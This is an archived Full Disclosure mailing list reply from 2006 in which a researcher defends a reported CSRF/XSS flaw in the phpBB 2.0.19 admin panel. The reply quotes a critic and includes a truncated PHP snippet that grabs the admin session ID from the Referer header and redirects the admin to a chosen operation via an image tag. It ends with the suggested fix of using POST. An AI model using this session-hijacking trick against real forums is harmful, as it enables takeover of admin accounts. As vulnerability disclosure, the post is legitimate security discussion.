Full Disclosure mailing list archives
RE: phpBB 2.0.19 Cross Site Request Forgeries and XSSAdmin
From: Maksymilian Arciemowicz <max () jestsuper pl>
Date: Fri, 3 Feb 2006 15:22:40 +0100
From: Berliner <berliner.does.not.mean.jelly.donut_at_googlemail.com> 1. Basically all phpBB admin-side options do allow full HTML, including javascript. That is the intended behaviour, as there are legitimate uses. phpBB does however check the Session ID before allowing the changes to go to the database. Your exploit needs a valid admin session key and you need to get the admin to visit the page (unless you happen to have a lot of luck with your IP)- be it by a link or a reflecting page. And even then, it will only work, when the admin has logged into the ACP prior to running into the trap.
$sid=''; preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid); if($sid[1]!=''){ header("Location: ".$operation."&sid=".$sid[1]); if you have example <IMG SRC="http://SOME.SCRIPT.PHP"> and you send reffere... (testes in IE, Mozilla etc) that please check.. getenv('HTTP_REFERER') The phpBB team was informed about this issues and they confirmed that these vulnerabilitie exists in phpBB 2.0.19. Solusion is use POST for all operation.
2. That is a general problem with all pages allowing of-site pictures. It has been discussed on the list before. Most of your examples won't work with phpBB, due to the missing Session ID in the links.
-- pub 1024D/7FDF4CEE 2005-09-21 uid Maksymilian Arciemowicz (cXIb8O3) <max () jestsuper pl> sub 2048g/AE816DB6 2005-09-21 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- RE: phpBB 2.0.19 Cross Site Request Forgeries and XSSAdmin Maksymilian Arciemowicz (Feb 03)